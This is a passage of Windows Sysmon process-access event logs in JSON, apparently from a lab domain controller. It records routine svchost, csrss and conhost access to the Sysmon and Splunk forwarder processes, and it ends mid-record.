{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3670,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.530\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.530","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3671,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.530\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.530","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3672,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.530\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.530","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3673,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.530\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.530","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3674,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.530\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.530","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3675,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.530\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.530","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3676,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.530\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.530","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3677,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.530\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023E-5F25-0000-0010836D0500}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.530","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023E-5F25-0000-0010836D0500}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3678,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.546\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023E-5F25-0000-0010836D0500}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 